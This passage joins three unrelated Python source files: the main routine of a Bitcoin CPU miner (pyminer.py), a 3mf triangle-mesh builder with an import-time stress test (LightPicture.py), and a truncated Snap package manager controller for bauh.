    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)
    # parse a simple key=value config file, skipping '#' comment lines
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue
        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()
    # fill in defaults for anything the config file did not provide
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 8638
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)
    # config values arrive as strings; coerce the numeric ones
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])
    # one OS process per mining thread (avoids the GIL for the hash loop)
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)			# stagger threads
    print settings['threads'], "mining threads started"
    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
LightPicture.py |
""" VERSION INFO
Current:
v_4_2
Tested TriangleMeshBuilder basic functionality, saving to 3mf file, timing
* see test test_random_big_file for details of usage
History:
v_4_1
Added TriangleMeshBuilder class
Integrated TriangleMesh and 3mfFileWriter classes into the TriangleMeshBuilder
!! see test_create_sample_file in unit test file
!! for a quick reference and working example
v_3_3
Working on Triangle Mesh, added 3mffilewriter class
v_3_2
Merged Vertex and Coordinate classes together
"""
from PIL import Image
import xml.etree.ElementTree as ET
from xml.dom import minidom
import os
import shutil
import timeit
import subprocess
import threading
import time
import random
class Vertex:
    """
    This class represents the idea of Vertex.
    in 3d graphics context:
    Vertex is a point defined in 3d space
    in 3mf context:
    also has additional 'sequence number' assigned. This is its place on the 3mf vertices list.
    """
    def __init__(self, key=None):
        # Public method aliases: the key argument is "interpreted" by passing it
        # through each context method until one of them accepts it.
        self.coordinates = self._coordinates    # Interpret key in 'coordinates' context
        self._self_coordinates = []             # Actual self Coordinates
        self.sequence_number = None             # Return or set 3mf vertex sequence number
        self.parents = self._parents            # Interpret key in 'parent' context
        self._self_parents = set()              # Triangles that reference this Vertex
        self.scale = self._scale                # Return scaled Coordinate
        self.translate = self._translate        # Return translated Coordinate
        # Try passing key in coordinates context
        try:
            assigned = self._coordinates(key)
        except Exception as e:
            print(self, e)
            raise e
        # if key not evaluated then try in parents context
        if not assigned:
            try:
                assigned = self._parents(key)
            except Exception as e:
                print(self, e)
                raise e

    def _parents(self, key=None):
        """
        This is how Vertex treats objects passed in the context of 'parent' concept.

        :param key: None to read the parent set, or a Triangle to register as parent
        :return: the parent set when key is None or not a Triangle;
                 NOTE(review): when key IS a Triangle this method falls through and
                 returns None (no explicit return after the add) -- confirm intended.
        """
        # key is None
        # return own parents
        if key is None:
            return self._self_parents
        # key is of type Triangle
        # check if the Triangle is already a parent, if not then add as a parent
        if type(key) is Triangle:
            try:
                self._self_parents.add(key)
            except Exception as e:
                print(self, e)
                raise e
        else:
            return self._self_parents

    def _coordinates(self, key=None):
        """
        Set or Get coordinates of this Vertex
        Also evaluate key for the __init__ method
        :param key: None, int, iterable of 3 ints
        :return: mainly own Coordinates
        """
        # if key is None
        if key is None:
            if self._self_coordinates is not None:
                return self._self_coordinates
            else:
                return True
        # if key is iterable of 3 ints
        key_len = None
        try:
            key_len = len(key)
        except Exception as e:
            pass
        else:  # key is iterable
            # assign to own coordinates
            if type(key_len) is int and key_len == 3:
                for c in key:
                    if type(c) is not float and type(c) is not int:
                        raise TypeError("Expected exactly 3 numbers")
                # NOTE(review): the iterable is stored by reference, not copied,
                # so later mutation of the caller's list mutates this Vertex.
                self._self_coordinates = key
                return True
            else:
                return False
        # if argument parses to int
        # pass it to own Coordinates object
        v_idx = None
        try:
            v_idx = int(key)
        except Exception as e:
            pass
        if type(v_idx) is int:
            # indices -2..2 address a single coordinate component
            if -3 < v_idx < 3:
                return self._self_coordinates[v_idx]
        return False

    def _scale(self, key=None):
        """
        Scale coordinate component-wise using an iterable; returns self (fluent).
        """
        try:
            own_dimension = len(self._self_coordinates)
            key_dimension = len(key)  # NOTE(review): computed but never checked
        except Exception as e:
            print(self, e)
            raise e
        for i in range(own_dimension):
            try:
                self._self_coordinates[i] *= key[i]
            except Exception as e:
                print(self, e)
                raise e
        return self

    def _translate(self, key=None):
        """
        Translate coordinate component-wise using an iterable; returns self (fluent).
        """
        try:
            own_dimension = len(self._self_coordinates)
            key_dimension = len(key)  # NOTE(review): computed but never checked
        except Exception as e:
            print(str(e))
            raise e
        for i in range(own_dimension):
            try:
                self._self_coordinates[i] += key[i]
            except Exception as e:
                print(str(e))
                raise e
        return self

    def __str__(self):
        # NOTE(review): str(self.coordinates) renders the bound method object,
        # not the coordinate values -- probably meant str(self.coordinates()).
        s = f'(Vertex.\n' \
            + 'Coordinate: ' + str(self.coordinates) + '\n' \
            + 'Sequence number: ' + str(self.sequence_number) + ')'
        return s

    def __len__(self):
        # Dimensionality of the stored coordinates (normally 3).
        try:
            own_length = len(self._self_coordinates)
        except Exception as e:
            print(self, e)
            raise e
        return own_length
class Triangle:
    """
    A Triangle is here, because it represents a part of the problem and a part of its solution.
    As a part of the problem it represents an important concept in the domain of computer 3D graphics,
    and what I'm here for is kind of this very thing:
    to create a 3D surface (namely: the problem, the unknown that's being solved for) for printing, using a computer.
    > So, 3D models are represented as a mesh of interconnected triangles.
    As a part of the solution it is a necessity for constructing a 3mf file, which is accepted by a slicer app
    (I chose 3mf because of how effortless it appeared to me to programmatically build a 3d mesh
    while thinking of it in a rather familiar context of points and triangles in 3d space)
    > So, 3mf describes surfaces as interconnected triangles in a 3d space
    """
    def __init__(self, key=None):
        self.vertices = self._vertices        # Vertex object(s) handling ('children')
        self._self_v_0 = None                 # Actual self vertex #0
        self._self_v_1 = None                 # Actual self vertex #1
        self._self_v_2 = None                 # Actual self vertex #2
        self.parent_mesh = self._parent_mesh  # TriangleMesh object handling ('parent')
        self._self_parent_mesh = None
        self.flip = NotImplemented            # Return or set self flipped (not implemented yet)
        # Try passing the key to self._vertices
        try:
            assigned = self._vertices(key)
        except Exception as e:
            print(self, e)
            raise e
        else:
            if not assigned:
                raise TypeError("Unexpected key type")

    def _vertices(self, key=None):
        """
        This is what triangle thinks of Vertices.
        This explains what triangle would like to do with a Vertex, if it could recognise any.
        :param key: None, int in range <0,3), or an iterable of 3 Vertex objects / coordinate triples
        :return: mainly own vertices; True when the key was consumed as an assignment
        """
        # if argument is None
        # return the sequence of own vertices
        if key is None:
            return [self._self_v_0, self._self_v_1, self._self_v_2]
        # if argument is a single Vertex object: rejected (a triangle needs 3)
        if type(key) is Vertex:
            raise TypeError("The triangle does not know what to do with a single Vertex object")
        # if argument parses to int: return the vertex at that index
        v_idx = None
        try:
            v_idx = int(key)
        except Exception as e:
            pass
        if type(v_idx) is int:
            if v_idx == 0:
                return self._self_v_0
            elif v_idx == 1:
                return self._self_v_1
            elif v_idx == 2:
                return self._self_v_2
            else:
                raise IndexError("Index value out of range")
        # if argument is an iterable of length 3
        key_len = None
        try:
            key_len = len(key)
        except Exception as e:
            pass
        else:
            if key_len is not None and key_len == 3:
                # key is iterable of length 3
                if type(key[0]) is Vertex and \
                        type(key[1]) is Vertex and \
                        type(key[2]) is Vertex:
                    # if a triangle is given 3 vertices, it adopts them
                    try:
                        key[0].parent_triangle = self
                        key[1].parent_triangle = self
                        key[2].parent_triangle = self
                    except Exception as e:
                        # best effort: adoption failure is deliberately ignored
                        pass
                    self._self_v_0 = key[0]
                    self._self_v_1 = key[1]
                    self._self_v_2 = key[2]
                    return True
                elif type(key[0]) is not int and \
                        type(key[1]) is not int and \
                        type(key[2]) is not int:
                    # if iterable content is not Vertex and not int objects then try to construct Vertex(s)
                    # NOTE(review): the bare except hides any construction failure,
                    # and key[i].parent_triangle is set on the RAW inputs, not on the
                    # Vertex objects just built -- confirm intended.
                    try:
                        self._self_v_0 = Vertex(key[0])
                        self._self_v_1 = Vertex(key[1])
                        self._self_v_2 = Vertex(key[2])
                        key[0].parent_triangle = self
                        key[1].parent_triangle = self
                        key[2].parent_triangle = self
                    except:
                        pass
                    return True
                else:
                    # iterable of ints (or mixed): store the elements as-is
                    self._self_v_0 = key[0]
                    self._self_v_1 = key[1]
                    self._self_v_2 = key[2]
                    return True
            else:
                raise IndexError("Expected exactly 3 objects")
        raise TypeError("Unexpected key type")

    def _parent_mesh(self, key=None):
        """
        This is how Triangle treats objects passed in the context of 'parent' concept
        """
        if key is None:
            # if key is None just return self parent
            return self._self_parent_mesh
        if type(key) is TriangleMesh:
            # if key is of type TriangleMesh then assign it as self parent
            self._self_parent_mesh = key
class TriangleMesh:
    """Container that accumulates Triangle objects for later serialisation."""
    def __init__(self, key=None):
        # Public alias: callers use self.triangles(...) to read or extend the mesh.
        self.triangles = self._triangles
        self._self_triangles = []  # backing list of Triangle objects
        # Evaluate the constructor argument in the 'triangles' context.
        try:
            self._triangles(key)
        except Exception as e:
            print(self, e)
            raise e

    def _triangles(self, key=None):
        """Read (key=None), append a single Triangle, or append every Triangle
        found in an iterable. Returns the list, True on append, False otherwise."""
        if key is None:
            return self._self_triangles
        if type(key) is Triangle:
            self._self_triangles.append(key)
            return True
        # Anything with a length is treated as an iterable of candidate Triangles;
        # non-Triangle elements are silently skipped.
        try:
            length = len(key)
        except Exception:
            length = None
        if type(length) is int:
            self._self_triangles.extend(t for t in key if type(t) is Triangle)
            return True
        return False
class Xml3mfWriter:
    """ this class is designed to format global vertices and triangles list from LightVoxelBox object
    and put them into the actual 3mf file and package """
    def __init__(self, triangle_mesh: TriangleMesh):
        self.triangle_mesh = triangle_mesh  # mesh whose triangles/vertices will be serialised
        self.xml_root = None       # :ET.Element -- the 3mf <model> root element
        self.xml_vertices = None   # :ET.Element -- the <vertices> element inside <mesh>
        self.xml_triangles = None  # :ET.Element -- the <triangles> element inside <mesh>
        self._debug = False        # print progress messages when True

    def mesh_to_xml(self):
        """Build the full 3mf xml tree: number each unique Vertex and emit one
        <vertex> per unique point plus one <triangle> per Triangle in the mesh."""
        self.create_3mf_structure()
        global_vertex_number = 0
        triangles = self.triangle_mesh.triangles()
        for t in triangles:
            vertices = t.vertices()
            # for every vertex in triangle try appending to file and numbering it
            for v in vertices:
                # get every Vertex in every Triangle
                # if Vertex has sequence number assigned then pass
                if v.sequence_number is not None:
                    continue
                # if vertex has no sequence number - generate it, add vertex to file
                # assign current global vertex number and increase it by one
                v.sequence_number = global_vertex_number
                global_vertex_number += 1
                # add to xml structure
                # elements will be printed to file in the same order,
                # so adding them and numbering here at the same time keeps coherence
                new_vert = ET.SubElement(self.xml_vertices, 'vertex')
                coord = v.coordinates()
                new_vert.attrib['x'] = str(coord[0])
                new_vert.attrib['y'] = str(coord[1])
                new_vert.attrib['z'] = str(coord[2])
            # now get the triangle itself and append to file,
            # referencing its vertices by their sequence numbers
            new_tria = ET.SubElement(self.xml_triangles, 'triangle')
            new_tria.attrib['v1'] = str(vertices[0].sequence_number)
            new_tria.attrib['v2'] = str(vertices[1].sequence_number)
            new_tria.attrib['v3'] = str(vertices[2].sequence_number)

    def create_3mf_structure(self):
        """ Create basic structure of 3mf file (without actual vertices and triangles) """
        # main xml element - "model". XML Root element.
        self.xml_root = ET.Element('model')
        self.xml_root.attrib['unit'] = 'millimeter'
        # # 3mf "resources" element:
        # xml element - "model" -> "resources"
        mf_resources = ET.SubElement(self.xml_root, 'resources')
        # xml element - "model" -> "resources" -> "object"
        mf_object = ET.SubElement(mf_resources, 'object')
        mf_object.attrib['type'] = 'model'
        mf_object.attrib['id'] = '1'
        # xml element - "model" -> "resources" -> "object" -> "mesh"
        # this will contain ACTUAL 3d object data: vertices and triangles
        mf_mesh = ET.SubElement(mf_object, 'mesh')
        # xml element - "model" -> "resources" -> "object" -> "mesh" -> "vertices"
        self.xml_vertices = ET.SubElement(mf_mesh, 'vertices')
        # xml element - "model" -> "resources" -> "object" -> "mesh" -> "triangles"
        self.xml_triangles = ET.SubElement(mf_mesh, 'triangles')
        # second "object" (id 2): wraps object 1 as a component
        mf_object = ET.SubElement(mf_resources, 'object')
        mf_object.attrib['type'] = 'model'
        mf_object.attrib['id'] = '2'
        # xml element - "model" -> "resources" -> "object" -> "components"
        mf_components = ET.SubElement(mf_object, 'components')
        # # create more components (copy of object) and translate them
        mf_component = ET.SubElement(mf_components, 'component')
        mf_component.attrib['objectid'] = '1'
        # # 3mf "build" element:
        # xml element - "model" -> "build": this will reference just a single 3D object based on "resources"
        mf_build = ET.SubElement(self.xml_root, 'build')
        # xml element - "model" -> "build" -> "item"
        mf_item = ET.SubElement(mf_build, 'item')
        mf_item.attrib['objectid'] = '2'
        if self._debug:
            print('Basic xml structure of 3mf file created.')

    def save_3mf(self):
        """ Save complete 3mf xml structure to a file and make it a legit 3mf package """
        # create folder named "3D" inside the staging "ZIP" folder
        try:
            os.mkdir('ZIP')
            os.mkdir('ZIP/3D')
        except FileExistsError:
            pass
        # make xml pretty and save xml file as "[name].model"
        xmlstr = minidom.parseString(ET.tostring(self.xml_root)).toprettyxml(indent="   ")
        with open("ZIP/3D/mymesh.model", "w") as f:
            f.write(xmlstr)
        # compress "3D" folder to a zip file (a 3mf package is a zip archive)
        shutil.make_archive('mymesh', 'zip', 'ZIP')
        # delete previous 3mf file if it exists
        if os.path.isfile('mymesh.3mf'):
            os.remove('mymesh.3mf')
        # change file extension from 'zip' to '3mf'
        try:
            os.rename('mymesh.zip', 'mymesh.3mf')
        except FileExistsError as e:
            print(str(e))
        if self._debug:
            print('3mf package created.')
class TriangleMeshBuilder:
    """
    This class describes an object that connects abstract points in space with Triangle objects
    while making sure that no Vertex object is unnecessarily duplicated.
    Basically it will hold a 3d array of Vertex objects
    It can return a Vertex at given coordinates
    it can abstract Triangle construction
    methods:
    add vertex
    if there is a Vertex at given point then return it
    if there is no Vertex then create it and then return it
    add triangle
    check if all required vertices are existing, if not add necessary
    construct Triangle object
    For the TriangleMeshBuilder you can provide a list of points in the form of [p_1, p_2, p_3, ...]
    where p_n is [x, y, z]
    it can eventually be used to save 3mf file
    it will take care of
    - creating a list of UNIQUE points (because every point WILL belong to more than one triangle)
    - putting them in unique order into a file
    - describing triangles using this ordering information in terms of defining vertices of the triangles
    """
    def __init__(self, key=None):
        self.triangle_mesh = TriangleMesh()
        self.triangle = self._triangle     # add a triangle with given [[x0, y0, z0], [x1, y1, z1], [x2, y2, z2]]
        self.writer = Xml3mfWriter(self.triangle_mesh)
        self.mesh_to_xml = self._mesh_to_xml  # build the xml document for the current mesh
        self.save_3mf = self._save_3mf        # write the xml document out as a .3mf package
        self._3d_space = None                 # 3d array of Vertex slots, addressed [x][y][z]
        self._vertex = self.__vertex          # add or return vertex at given [x, y, z]
        # require key to be in format [x, y, z] - space dimensions
        # TODO: recognize and evaluate the key instead of just accepting it as 'size'
        self.size = key
        # prepare the 3d space - it can actually take significant amount of time to just construct the array
        self._init_3d_space()

    def _init_3d_space(self):
        # This array is created so that the addressing is _3d_space[x][y][z]
        self._3d_space = \
            [[[None for z in range(self.size[2])] for y in range(self.size[1])] for x in range(self.size[0])]

    def __vertex(self, key: list = None):
        """
        if there is a Vertex at given point then return it
        if there is no Vertex then create it and then return it
        Input argument should be [x, y, z]
        """
        # return Vertex at given coordinates, if there is any
        this_vertex = self._3d_space[key[0]][key[1]][key[2]]
        if this_vertex is not None:
            return this_vertex
        # if there is None then create it and then return it
        coords = [key[0], key[1], key[2]]
        this_vertex = Vertex(coords)
        self._3d_space[key[0]][key[1]][key[2]] = this_vertex
        return this_vertex

    def _triangle(self, key: list = None):
        """
        check if all required vertices are existing, if not add necessary
        construct Triangle object
        Input argument should be [[x0, y0, z0], [x1, y1, z1], [x2, y2, z2]]
        """
        # extract 3 distinct points
        v0_coords = key[0]
        v1_coords = key[1]
        v2_coords = key[2]
        # get Vertex objects via own method (deduplicated through the 3d space array)
        v0 = self.__vertex(v0_coords)
        v1 = self.__vertex(v1_coords)
        v2 = self.__vertex(v2_coords)
        # construct a Triangle, register it with the mesh, and return it
        t = Triangle([v0, v1, v2])
        self.triangle_mesh.triangles(t)
        return t

    def _mesh_to_xml(self):
        # Delegate xml construction to the writer.
        self.writer.mesh_to_xml()

    def _save_3mf(self):
        # Delegate packaging/saving to the writer.
        self.writer.save_3mf()
# --- module-level demo / benchmark (runs at import time) ---
# Seed shape: four triangles forming a small pyramid-like test solid.
triangles = [
    [
        [0, 0, 0], [10, 0, 0], [5, 5, 0]
    ],
    [
        [0, 0, 0], [5, 5, 0], [2, 2, 20]
    ],
    [
        [2, 2, 20], [5, 5, 0], [10, 0, 0]
    ],
    [
        [0, 0, 0], [2, 2, 20], [10, 0, 0]
    ]
]
# Dimensions of the builder's vertex lookup space (x, y, z).
[x, y, z] = [400, 400, 100]
# generate random triangles: 100k extra triangles inside the space (stress test)
t0 = time.perf_counter()
rand = random.random
for n in range(100_000):
    triangles.append([
        [int(rand()*x), int(rand()*y), int(rand()*z)],
        [int(rand()*x), int(rand()*y), int(rand()*z)],
        [int(rand()*x), int(rand()*y), int(rand()*z)]
    ])
t0 = time.perf_counter() - t0
# create mesh builder object (allocating the 400x400x100 array takes noticeable time)
t1 = time.perf_counter()
tmb = TriangleMeshBuilder([x, y, z])
t1 = time.perf_counter() - t1
# give all triangles to the mesh builder
t2 = time.perf_counter()
for t in triangles:
    tmb.triangle(t)
t2 = time.perf_counter() - t2
# build xml structure
t3 = time.perf_counter()
tmb.mesh_to_xml()
t3 = time.perf_counter() - t3
# save 3mf file
t4 = time.perf_counter()
tmb.save_3mf()
t4 = time.perf_counter() - t4
# NOTE(review): t0..t4 hold the per-stage timings but are never printed or used.
# Commented-out experiment kept for reference: background rebuild thread + self-test hook.
# speed = None
# def demon():
#     global speed
#     while(1):
#         t1 = time.perf_counter()
#         for t in triangles:
#             tmb.triangle(t)
#         tmb.mesh_to_xml()
#         speed = time.perf_counter() - t1
# x = threading.Thread(target=demon, args=(1,), daemon=True)
# T = threading.Thread(target=demon)
# # set thread as Daemon
# T.setDaemon(True)
# T.start()
# """ SELF TEST """
# if __name__ == "__main__":
#     # if loaded as __main__ run self test
#     subprocess.call(["python", "LightPicture_Test.py"])
|
controller.py | import re
import time
from datetime import datetime
from threading import Thread
from typing import List, Set, Type
from bauh.api.abstract.controller import SoftwareManager, SearchResult, ApplicationContext
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher
from bauh.api.abstract.model import SoftwarePackage, PackageHistory, PackageUpdate, PackageSuggestion, \
SuggestionPriority
from bauh.api.abstract.view import SingleSelectComponent, SelectViewType, InputOption
from bauh.commons.category import CategoriesDownloader
from bauh.commons.html import bold
from bauh.commons.system import SystemProcess, ProcessHandler, new_root_subprocess
from bauh.gems.snap import snap, URL_CATEGORIES_FILE, SNAP_CACHE_PATH, CATEGORIES_FILE_PATH, SUGGESTIONS_FILE
from bauh.gems.snap.constants import SNAP_API_URL
from bauh.gems.snap.model import SnapApplication
from bauh.gems.snap.worker import SnapAsyncDataLoader
# Captures "<channel> <snap install command>" pairs printed by snapd when a snap
# is not available on the 'stable' channel. The original wrapped re.compile()
# around an already-compiled pattern; a single compile is equivalent and clearer.
RE_AVAILABLE_CHANNELS = re.compile(r'(\w+)\s+(snap install.+)')
class SnapManager(SoftwareManager):
    """bauh gem that manages Snap packages: search, install/uninstall/refresh,
    suggestions and metadata retrieval via the snap/snapd CLI and the Snap store API."""

    def __init__(self, context: ApplicationContext):
        super(SnapManager, self).__init__(context=context)
        self.i18n = context.i18n
        self.api_cache = context.cache_factory.new()
        context.disk_loader_factory.map(SnapApplication, self.api_cache)
        self.enabled = True
        self.http_client = context.http_client
        self.logger = context.logger
        self.ubuntu_distro = context.distro == 'ubuntu'
        self.categories = {}  # snap name (lowercase) -> category list, filled by the downloader
        self.categories_downloader = CategoriesDownloader('snap', self.http_client, self.logger, self, context.disk_cache,
                                                          URL_CATEGORIES_FILE, SNAP_CACHE_PATH, CATEGORIES_FILE_PATH)
        self.suggestions_cache = context.cache_factory.new()
        self.info_path = None  # lazily resolved snapd app-info directory (see get_info_path)

    def get_info_path(self) -> str:
        """Resolve (once) and return the path of snapd's application info directory."""
        if self.info_path is None:
            self.info_path = snap.get_app_info_path()
        return self.info_path

    def map_json(self, app_json: dict, installed: bool, disk_loader: DiskCacheLoader, internet: bool = True) -> SnapApplication:
        """Convert a raw snap JSON payload into a SnapApplication, filling categories,
        disk-cached data and (optionally) fresh API data in the background."""
        app = SnapApplication(publisher=app_json.get('publisher'),
                              rev=app_json.get('rev'),
                              notes=app_json.get('notes'),
                              has_apps_field=app_json.get('apps_field', False),
                              id=app_json.get('name'),
                              name=app_json.get('name'),
                              version=app_json.get('version'),
                              latest_version=app_json.get('version'),
                              description=app_json.get('description', app_json.get('summary')),
                              verified_publisher=app_json.get('developer_validation', '') == 'verified')
        # A trailing '*' on the publisher name also marks a verified publisher.
        if app.publisher and app.publisher.endswith('*'):
            app.verified_publisher = True
            app.publisher = app.publisher.replace('*', '')
        categories = self.categories.get(app.name.lower())
        if categories:
            app.categories = categories
        app.installed = installed
        # Non-application snaps (bases, core snaps, ...) are tagged as 'runtime'.
        if not app.is_application():
            categories = app.categories
            if categories is None:
                categories = []
                app.categories = categories
            if 'runtime' not in categories:
                categories.append('runtime')
        api_data = self.api_cache.get(app_json['name'])
        expired_data = api_data and api_data.get('expires_at') and api_data['expires_at'] <= datetime.utcnow()
        if (not api_data or expired_data) and app.is_application():
            if disk_loader and app.installed:
                disk_loader.fill(app)
            if internet:
                # Fetch fresh store data asynchronously so the UI is not blocked.
                SnapAsyncDataLoader(app=app, api_cache=self.api_cache, manager=self, context=self.context).start()
        else:
            app.fill_cached_data(api_data)
        return app

    def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
        """Search the Snap store, splitting results into already-installed and new packages."""
        if is_url:
            # Snaps cannot be resolved from arbitrary URLs.
            return SearchResult([], [], 0)
        if snap.is_snapd_running():
            installed = self.read_installed(disk_loader).installed
            res = SearchResult([], [], 0)
            for app_json in snap.search(words):
                already_installed = None
                if installed:
                    already_installed = [i for i in installed if i.id == app_json.get('name')]
                    already_installed = already_installed[0] if already_installed else None
                if already_installed:
                    res.installed.append(already_installed)
                else:
                    res.new.append(self.map_json(app_json, installed=False, disk_loader=disk_loader))
            res.total = len(res.installed) + len(res.new)
            return res
        else:
            return SearchResult([], [], 0)

    def read_installed(self, disk_loader: DiskCacheLoader, limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None) -> SearchResult:
        """List locally installed snaps (requires snapd running and a resolvable info path)."""
        info_path = self.get_info_path()
        if snap.is_snapd_running() and info_path:
            # Wait for the category mapping so installed apps get categorised.
            self.categories_downloader.join()
            installed = [self.map_json(app_json, installed=True, disk_loader=disk_loader, internet=internet_available) for app_json in snap.read_installed(info_path)]
            return SearchResult(installed, None, len(installed))
        else:
            return SearchResult([], None, 0)

    def downgrade(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
        """Revert the snap to its previous revision."""
        return ProcessHandler(watcher).handle(SystemProcess(subproc=snap.downgrade_and_stream(pkg.name, root_password), wrong_error_phrase=None))

    def update(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> SystemProcess:
        # Snaps auto-update through snapd; manual per-package update is unsupported.
        raise Exception("'update' is not supported by {}".format(pkg.__class__.__name__))

    def uninstall(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
        """Uninstall the snap and drop its cached suggestion, if any."""
        uninstalled = ProcessHandler(watcher).handle(SystemProcess(subproc=snap.uninstall_and_stream(pkg.name, root_password)))
        if self.suggestions_cache:
            self.suggestions_cache.delete(pkg.name)
        return uninstalled

    def get_managed_types(self) -> Set[Type[SoftwarePackage]]:
        return {SnapApplication}

    def clean_cache_for(self, pkg: SnapApplication):
        super(SnapManager, self).clean_cache_for(pkg)
        self.api_cache.delete(pkg.id)

    def get_info(self, pkg: SnapApplication) -> dict:
        """Collect displayable information for the snap from the CLI plus cached fields."""
        info = snap.get_info(pkg.name, attrs=('license', 'contact', 'commands', 'snap-id', 'tracking', 'installed'))
        info['description'] = pkg.description
        info['publisher'] = pkg.publisher
        info['revision'] = pkg.rev
        info['name'] = pkg.name
        if info.get('commands'):
            info['commands'] = ' '.join(info['commands'])
        # 'unset' is snapd's placeholder for a missing license -- hide it.
        if info.get('license') and info['license'] == 'unset':
            del info['license']
        return info

    def get_history(self, pkg: SnapApplication) -> PackageHistory:
        # snapd exposes no per-package history.
        raise Exception("'get_history' is not supported by {}".format(pkg.__class__.__name__))

    def install(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
        """Install the snap; when it is unavailable on 'stable', offer the user the
        alternative channels parsed from the installation output."""
        info_path = self.get_info_path()
        if not info_path:
            self.logger.warning('Information directory was not found. It will not be possible to determine if the installed application can be launched')
        res, output = ProcessHandler(watcher).handle_simple(snap.install_and_stream(pkg.name, pkg.confinement, root_password))
        if 'error:' in output:
            res = False
            if 'not available on stable' in output:
                channels = RE_AVAILABLE_CHANNELS.findall(output)
                if channels:
                    opts = [InputOption(label=c[0], value=c[1]) for c in channels]
                    channel_select = SingleSelectComponent(type_=SelectViewType.RADIO, label='', options=opts, default_option=opts[0])
                    body = '<p>{}.</p>'.format(self.i18n['snap.install.available_channels.message'].format(bold(self.i18n['stable']), bold(pkg.name)))
                    body += '<p>{}:</p>'.format(self.i18n['snap.install.available_channels.help'])
                    if watcher.request_confirmation(title=self.i18n['snap.install.available_channels.title'],
                                                    body=body,
                                                    components=[channel_select],
                                                    confirmation_label=self.i18n['continue'],
                                                    deny_label=self.i18n['cancel']):
                        self.logger.info("Installing '{}' with the custom command '{}'".format(pkg.name, channel_select.value))
                        res = ProcessHandler(watcher).handle(SystemProcess(new_root_subprocess(channel_select.value.value.split(' '), root_password=root_password)))
                        if res and info_path:
                            pkg.has_apps_field = snap.has_apps_field(pkg.name, info_path)
                        return res
                else:
                    self.logger.error("Could not find available channels in the installation output: {}".format(output))
        else:
            if info_path:
                pkg.has_apps_field = snap.has_apps_field(pkg.name, info_path)
        return res

    def is_enabled(self) -> bool:
        return self.enabled

    def set_enabled(self, enabled: bool):
        self.enabled = enabled

    def can_work(self) -> bool:
        # The gem only works when the snap CLI is installed.
        return snap.is_installed()

    def requires_root(self, action: str, pkg: SnapApplication):
        # Every action except searching needs root privileges.
        return action != 'search'

    def refresh(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
        """Refresh (update) the snap to the latest revision of its channel."""
        return ProcessHandler(watcher).handle(SystemProcess(subproc=snap.refresh_and_stream(pkg.name, root_password)))

    def prepare(self):
        # Kick off the category download early; consumers join() it later.
        self.categories_downloader.start()

    def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
        # Snaps self-update via snapd, so there is nothing to report.
        pass

    def list_warnings(self, internet_available: bool) -> List[str]:
        """Return user-facing warnings (snapd down / Snap API unreachable), or None."""
        if snap.is_installed():
            if not snap.is_snapd_running():
                snap_bold = bold('Snap')
                return [self.i18n['snap.notification.snapd_unavailable'].format(bold('snapd'), snap_bold),
                        self.i18n['snap.notification.snap.disable'].format(snap_bold, bold('{} > {}'.format(self.i18n['settings'].capitalize(),
                                                                                                            self.i18n['core.config.tab.types'])))]
            elif internet_available:
                available, output = snap.is_api_available()
                if not available:
                    self.logger.warning('It seems Snap API is not available. Search output: {}'.format(output))
                    return [self.i18n['snap.notifications.api.unavailable'].format(bold('Snaps'), bold('Snap'))]

    def _fill_suggestion(self, pkg_name: str, priority: SuggestionPriority, out: List[PackageSuggestion]):
        """Fetch one suggestion from the Snap store API and append it to *out* (thread target)."""
        res = self.http_client.get_json(SNAP_API_URL + '/search?q=package_name:{}'.format(pkg_name))
        if res and res['_embedded']['clickindex:package']:
            pkg = res['_embedded']['clickindex:package'][0]
            pkg['rev'] = pkg['revision']
            pkg['name'] = pkg_name
            sug = PackageSuggestion(self.map_json(pkg, installed=False, disk_loader=None), priority)
            self.suggestions_cache.add(pkg_name, sug)
            out.append(sug)
        else:
            self.logger.warning("Could not retrieve suggestion '{}'".format(pkg_name))

    def list_suggestions(self, limit: int, filter_installed: bool) -> List[PackageSuggestion]:
        """Download the suggestions file ('priority=name' lines) and resolve each
        entry concurrently, skipping installed snaps when requested."""
        res = []
        if snap.is_snapd_running():
            self.logger.info('Downloading suggestions file {}'.format(SUGGESTIONS_FILE))
            file = self.http_client.get(SUGGESTIONS_FILE)
            if not file or not file.text:
                self.logger.warning("No suggestion found in {}".format(SUGGESTIONS_FILE))
                return res
            else:
                self.logger.info('Mapping suggestions')
                self.categories_downloader.join()
                suggestions, threads = [], []
                installed = {i.name.lower() for i in self.read_installed(disk_loader=None).installed} if filter_installed else None
                for l in file.text.split('\n'):
                    if l:
                        if limit <= 0 or len(suggestions) < limit:
                            sug = l.strip().split('=')
                            name = sug[1]
                            if not installed or name not in installed:
                                cached_sug = self.suggestions_cache.get(name)
                                if cached_sug:
                                    res.append(cached_sug)
                                else:
